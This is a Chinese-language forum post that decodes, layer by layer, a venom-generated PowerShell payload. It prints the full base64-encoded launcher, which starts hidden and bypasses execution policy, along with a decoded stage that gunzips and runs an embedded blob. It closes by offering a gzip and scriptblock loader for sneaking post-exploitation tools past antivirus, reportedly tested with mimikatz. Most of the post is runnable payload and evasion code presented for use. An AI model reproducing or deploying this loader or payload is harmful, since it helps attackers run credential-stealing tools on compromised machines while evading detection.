前言


powershell具有在硬盘中易绕过,内存中难查杀的特点。venom中提供了一种加载方式,可以有效的绕过硬盘查杀。本文一层层把venom生成的外壳褪去,得到其加载方式。最后使用该方法,可以实现硬盘免杀
本例使用【2】Windows平台下,【10】bat+powerhsell生成。

第一层


  • 该层使用了base64编码,源码如下。
powershell.exe -nop -wind hidden -Exec Bypass -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJwAnAEgANABzAEkAQQBDAEoARgB0AFYAMABDAEEANwBWAFcAYgBXAC8AaQBPAEIARAArADMARQByADkARAA5AEUASwBLAFkAbQBPAEUAaQBqAHMAQwA1AFUAcQBYAGMASgBiAGEAQQBtAEYAQgBrAEsAQgBSAFMAZQBUAE8ATQBGAGcAWQBwAG8ANABMAGIAQwAzAC8ALwAzAEcAawBIAFMANwB0ACsAMwBkADcAawBrAFgAdABZAG8AegBuAGgAbgBQAFAAUABQAE0ARwBEADgASgBYAFUANQBZAEsATABrAHIANgBjAHYAWgA2AFUAawBQAFIAVwBnAHQASwBiAGwANABqAHYASgBTAHoAdgAxADAARQBhAGcAbgBKAHkARABQAGIAWgBLAGQAZABDAFUAcABVADMAMgB6AHEAYgBNADEASQB1AEgAcwA4AHIASwBXAFIAQgBFAE8AKwBmAEcANwAwAE0ASgBjAGoAMgBPADgAbgBsAE8AQwBZADAAVwBWAC8AcABSAEcAQwB4AHoAaAA4ADkAdgA1AEUAcgB0AGMAKwBpAEwAbAAvAGkAaQAwAEsASgBzAGoAbQBxAHIAdABhAHMAaABkAFkATwBsAGMARAB6ADIAeAAxADIARQB1AEUAcQBFAFUANwBBADAAbABYAEoARQAvAGYANQBiAFYANgBYAGwAcABWAG0AZwA4AEoASQBqAEcAaQBtAHoAdgBZAG8ANwBYAEIAWQA5AFMAVwBaAFcAKwBxAHUATABBAHcAVwA2AEQARgBkAGsAaQBiAHMAUgBpADUAdgBQAEMAaQBJAFQAbABpADgASQB3AGoASgBHAFAAdQArAEQAdABFAFYAdQBZAEwANQBnAFgAeQB5AG8AawBBAFgAOABSADUAawBrAFUAUwBpAEkAZABZAFgALwBjAFYAVwBSAFkAOQBpAEwAbQA2AHAANABYADQAVABpAFcAOAA5AEoAVQBlAEoANwBPAFoAcgA4AHIAMAAvAFQAWQB1AHkAVABrAFoASQAwAEwANwBaAEQAagBpAEcAMQBzAEgARAAwAFMARgA4AGMARgBFADQAVQBlAHgAWABmAFkAbgA0AEcAVgB6AFMATQBTAEIAagBOAFYAQgBiAFYASAB0AHMASgBLAEwAawB3AG8AegBVAHUALwA0AGsAYgBwADQAcQBjAE0AdABKADgAMQBVAGwANABhAGcAVgBhAFAAUgAyAG8AZQB5AHYAaABqAG0AaABiAHoARQBvAHEAUABoAHYASQByAGMAWQByAEsAcQAvAEIAawAxAFEAZgBjAHYAcAA2AGQAbgBwADMANgBHAFYARwBpAG0AKwBxAHcAOAA1AEkAcgBzAEQAcQBaAEgAdABZAFkAbwBsAE4ANgBMAEMAWQBIAHgAUwB1AHAAbQBKAGMAcwBPAEEAaAB4AEYAZwBuAHkANQBBAFoAUgBnAHQAWABaAE0ANwBaAFMAYgBoADQAawArAGIAZgBOAFMANQBrAHUAYQBKAEsASwBWADkAcQBDAGIATwBvAHcANABzADMAQQBKAHEAMQBuAEwAagBEAEwAUQB2AHcAMgBMAGUAdgBZAEoAeQBHAHUANwAwAEsAMABKAG0ANwBHAFAATwBVADEAawBMAEYAUAA4AFMASABIAFEAcQBiAFcAaABhAEEAVQBPAGQAMwBBAFgAaAAxAFQASABDAEEAdQBjAEIATwAxAC8AcwBHAHMAcwBTAGIAOAAyAGQAWgBJAEMAUABWAHcAcABMAHQAUQBxAEIAaQBpAGcAaABxAHEAMwB3AGQAegBMAEkAVQBpAHQAMABNAEwAcgB3AEcAaQA0AHoAZQBRAEwAKwBjAEQAMwAzAEcAbQBuAFgASgA4AGwANQAwAHUAdgBrAEYASgByAGwARQBVAHgAMwBtAHAAbAAwAEQARAB1AFgAbgBKAHgAbwBoAGkATAB5AC8AcABZAFUAegBTAEwAVAAzAGgANwBMAEMAVQB2ADQAVgByAEoAWgBRAFQARgA4AFUAOABjAHoAZABUAFUAeABqAFQANAAyAG8AcwBqAEgAbQBVAHUARgBBADAAUwBIADEAZwBiADcAQgBMAEUAQgBWAEkANQBDAFcAVABlAE4AagBZADIAUwBUAEkAagBwAFYAZgB4AGEARwBHAEsASQBVADIAQQBFACsAUABVAEEAZQBRAGkAUAB4AHQATABxAGcAUQBRAFkAUwBpADcARwByAEIAeAByAHkAOQAzAGwAQwA4AEIAcABWAEQAMwB6AGMAcABDAHEARABMAFUANgA0AGYAcQBJAE0AQwA3AE0AbAAvAGkAeQAvAGoAOABwAEcANABBAG8AZwBNAGcAUgBmAFIAUQBYAFYAdAB5AG4AaABlAGMAawBqAEUAWQBYAG8ASQBVAEEAOABVACsAawArAG4AdgA1AGcAYgBJAG8ANQBhAGgATgBNAHkASwBGAGwAMwBUAEkAMABkAEYANQBUAE8AdQBlAE8AbQAyAHgAUwBFAFQARgBFADUAWQBCAEIAeAB5AEwAOABaAHMAYgBXAEIAWQB2AHkAaABjAGgAdwBTAHkAagB2AHQAbAB0AFIAMABlAE0AYgB0AGsARgBxAHUAcwBTAEkAbAAvAFkAbQBVADIAaABiADgARAAwAG0ANQB6AGUAbwBmAHYAWgB2AHIAcABhAGwARgA5AGUAMwBDADEAOQB0AHgAMgB6AEoANwA5AGIANQBwAFYAaAA2AHYAYgBhAGYAQwA3AFUAYQBiADMALwBUAGEAMwBHAHIAYwBMADUAZQAyAGIAdAA0AE4AeAAzAHoAUwAxAHMAMABCAEsAYQA3AEcAbABmADMAbQBtAHUAegB0AGoAdQA2AE4AdAA5AHEASAB2AGIARgAvAEsAaAByAGIALwBUAEwAdwAvAEgASABkADkANABPAFAAdgBuADEAWABlAHQAOABrAG4AVgBHAHQAYgB4AFEAdgBVAEsAZgBlAFMARABvAGoANAA4AGsAbwBWAHUASQBHAGUAVABMADcAWgBOAGgAZgBYAFQAZgA1AGYATwB4AFEATgBQAFMAMQA0AEwANQBVAFIAVwBUAGIAaQBaAFoATwBpAFYAbgA3AHQAcQA2ADMARgBtAFYAMwBmACsAMAA3AHIAWQBYAGwANwBjAGEAbQBWAGgAMQBWAFYAbgBwAEQAMQAyAHQAaAB3ADIAawBhADcARwBaAHMAUgBIAHAAUABjADEAQwB3AG0AQQB4AHYATwA5AFYAKwAwADkAQwBIAHIAZQBWAEQAdgBhAG8ARgBvAEgAdQBQAGQAUABDAHgAZQBiAGgAKwB2ADIAWgA5AGgAMwByAHMAaQBjAGYAbABpAGEAWQA1AHoAZwBVAHAAZgB4AGcAcwBOAGEAMwBxADMAQwBOAHoARQBOAC8AKwBaAG0AbwBsAEIAOABQAGEAUwBRAFkAagBXAEkAOABXAHkALwBtAG8AcgB4AFAAYwB2AFgAZABLADcAcgBhADYAWgB2AGIASQBtAFIATgB0AE4ARABmAHYAYQB2ADEAUABlAHIALwBWAGgAWABkAC8ARwB4AGcAaQBqAHAARgBEAEoAeQAxAG4AOQBSADcAZQAzAFIARQB5AFEANgB0AFgAbQBXAHUAbABjAFIAZwBNAFEASwA3AHQARABWAFoAcgB1ADkANABZADQAawB5ADAAVwBvAG4AUgBDAGQAdABzAFIAdABYAFEAMQA1AHkAZQBQAHYAbABVAGcAdwBwAFUAegBHAEUAegBLAGIAbwBEAGQAMQAxADkAMABKAHMAOQByAGQAUwAvAHUAbgBvAG4ATwBBAEcAawB5AFAARgBoAHMASABwAFIANgA3AGUAbQB0AEkAVwBpAGUASQBFAG8AYwBBAEQAbQBiADkAWgAyAFQAUgBZADEAMAA1AEgAYQBZADAAUgBZAEsAQQByAGMAdwBTAHMAYwBoAFoAagBDAEgAUQBhADMAWABFAFoAZQBuAFYATABtAGkAbgBGACsASABMADEAdwBsAHgAdwBuAHYATABoAHcAaAByAEEAcwBYADcAeQA2AFUAcQBWAG4AUgBmAFgAYgBvAE0AOQBFAGwANQBjAFQAQwBGAEoATQBlAGMASABZAFEAZwBlAEgAQQBWAC8AawBpADkAdAB5AHMAUQBoAGoAdQA3AGkAdABGAEMASABMAG4AOAArAHMAeABqAFkANwA1AGUAZwByAEwAKwBiACsAQQBaAHQAbgA3AC8AVABnAFgAUgBXAGQAawB0AHQAYQAvAGUANwAvAEMAVgByAGEAbgBRAHQANABlAGYAOABLADIAagBmAFoAUAArAHoAKwBGAEoARABGAC8ARABIAGwASAA4AFQAZgBDADMANABKADEARgAvAE0AZgBJAFEASQBCAHoAMABiAGgAZwB2AEYAeAA3AHYAdABEAFEAQgBTAGcAcgB5ADQALwBrAFYAVgBvAFAAcAArACsAbwBoAGYAYgA3AGMASgBQACsALwBDAHIANABLAHoAMAA3ADgAQQA4AGMAeQBmAEMAUwBVAEsAQQBBAEEAPQAnACcAKQApACkALABbAFMAeQBzAHQAZQBtAC4ASQBPAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAC4AQwBvAG0AcAByAGUAcwBzAGkAbwBuAE0AbwBkAGUAXQA6ADoARABlAGMAbwBtAHAAcgBlAHMAcwApACkAKQAuAFIAZQBhAGQAVABvAEUAbgBkACgAKQApACkAJwA7ACQAcwAuAFUAcwBlAFMAaABlAGwAbABFAHgAZQBjAHUAdABlAD0AJABmAGEAbABzAGUAOwAkAHMALgBSAGUAZABpAHIAZQBjAHQAUwB0AGEAbgBkAGEAcgBkAE8AdQB0AHAAdQB0AD0AJAB0AHIAdQBlADsAJABzAC4AVwBpAG4AZABvAHcAUwB0AHkAbABlAD0AJwBIAGkAZABkAGUAbgAnADsAJABzAC4AQwByAGUAYQB0AGUATgBvAFcAaQBuAGQAbwB3AD0AJAB0AHIAdQBlADsAJABwAD0AWwBTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAUwB0AGEAcgB0ACgAJABzACkAOwA=
  • 使用 FromBase64String() 解码
$DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText))

第二层


  • 解码后如下
if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c &([scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String(''H4sIACJFtV0CA7VWbW/iOBD+3Er9D9EKKYmOEijsC5UqXcJbaAmFBkKBRSeTOMFgYpo4LbC3//3GkHS7t+3d7kkXtYoznhnPPPPMGD8JXU5YKLkr6cvZ6UkPRWgtKbl4jvJSzv10EagnJyDPbZKddCUpU32zqbM1IuHs8rKWRBEO+fG70MJcj2O8nlOCY0WV/pRGCxzh89v5Ertc+iLl/ii0KJsjmqrtashdYOlcDz2x12EuEqEU7A0lXJE/f5bV6XlpVmg8JIjGimzvYo7XBY9SWZW+quLAwW6DFdkibsRi5vPCiITli8IwjJGPu+DtEVuYL5gXyyokAX8R5kkUSiIdYX/cVWRY9iLm6p4X4TiW89JUeJ7OZr8r0/TYuyTkZI0L7ZDjiG1sHD0SF8cFE4UexXfYn4GVzSMSBjNVBbVHtsJKLkwozUu/4kbp4qcMtJ81Ul4agVaPR2oeyvhjmhbzEoqPhvIrcYrKq/Bk1Qfcvp6dnp36GVGim+qw85IrsDqZHtYYolN6LCYHxSupmJcsOAhxFgny5AZRgtXZM7ZSbh4k+bfNS5kuaJKKV9qCbOow4s3AJq1nLjDLQvw2LevYJyGu70K0Jm7GPOU1kLFP8SHHQqbWhaAUOd3AXh1THCAucBO1/sGssSb82dZICPVwpLtQqBiighqq3wdzLIUit0MLrwGi4zeQL+cD33GmnXJ8l50uvkFJrlEUx3mpl0DDuXnJxohiLy/pYUzSLT3h7LCUv4VrJZQTF8U8czdTUxjT42osjHmUuFA0SH1gb7BLEBVI5CWTeNjY2STIjpVfxaGGKIU2AE+PUAeQiPxtLqgQQYSi7GrBxry93lC8BpVD3zcpCqDLU64fqIMC7Ml/iy/j8pG4AogMgRfRQXVtynheckjEYXoIUA8U+k+nv5gbIo5ahNMyKFl3TI0dF5TOueOm2xSETFE5YBBxyL8ZsbWBYvyhchwSyjvtltR0eMbtkFqusSIl/YmU2hb8D0m5zeofvZvrpalF9e3C19tx2zJ79b5pVh6vbafC7Uab3/Ta3GrcL5e2bt4Nx3zS1s0BKa7Glf3mmuztju6Nt9qHvbF/Khrb/TLw/HHd94OPvn1Xet8knVGtbxQvUKfeSDoj48koVuIGeTL7ZNhfXTf5fOxQNPS14L5URWTbiZZOiVn7tq63FmV3f+07rYXl7camVh1VVnpD12thw2ka7GZsRHpPc1CwmAxvO9V+09CHreVDvaoFoHuPdPCxebh+v2Z9h3rsicfliaY5zgUpfxgsNa3q3CNzEN/+ZmolB8PaSQYjWI8Wy/morxPcvXdK7ra6ZvbImRNtNDfvav1Per/VhXd/GxgijpFDJy1n9R7e3REyQ6tXmWulcRgMQK7tDVZru94Y4ky0WonRCdtsRtXQ15yePvlUgwpUzGEzKboDd1190Js9rdS/unonOAGkyPFhsHpR67emtIWieIEocADmb9Z2TRY105HaY0RYKArcwSschZjCHQa3XEZenVLminF+HL1wlxwnvLhwhrAsX7y6UqVnRfXboM9El5cTCFJMecHYQgeHAV/ki9tysQhju7itFCHLn8+sxjY75egrL+b+AZtn7/TgXRWdktta/e7/CVranQt4ef8K2jfZP+z+FJDF/DHlH8TfC34J1F/MfIQIBz0bhgvFx7vtDQBSgry4/kVVoPp++ohfb7cJP+/Cr4Kz078A8cyfCSUKAAA=''))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);
  • 分析得到关键函数,System.IO.Compression.GzipStream 。本层利用gzip加密
    ## 第三层

  • 这一层是以二进制的形式读取压缩后的文件,然后将二进制进行base64编码。再使用FromBase64String将字符串转为二进制,用GzipStream读取,最后作为代码块执行。
    ## 总结

  1. 使用 FromBase64String 已经不可取了,因为该函数本身已经被标记为特征码了。
  2. 反病毒软件会自动对base64字符串进行分析,base64编码起不到混淆的作用。
  3. 可以在已经获得权限的场景下,将powerhsell后渗透工具gzip加密上传,使用 GzipStream 加载,达到免杀的效果。使用方法如下:
    • 将powerhsell脚本压缩为gzip
    • 以二进制形式读取压缩包
    • 使用本文最后的语句获得代码块
    • 执行代码块
  4. 亲测mimikatz免杀,但是提取密码失败了,,,
[scriptblock]::create((New-Object System.IO.StreamReader(New-Object System.IO.Compression.GzipStream((New-Object System.IO.MemoryStream(,[System.Convert]::FromBase64String($byte))),[System.IO.Compression.CompressionMode]::Decompress))).ReadToEnd())

扩展

对于exe也可以使用这种方法硬盘免杀,因为exe可以编码放到powershell里执行。但是本人在将exe放进powershell里执行的时候失败了,不懂为什么 ???

点击收藏 | 4 关注 | 2
  • 动动手指,沙发就是你的了!
登录 后跟帖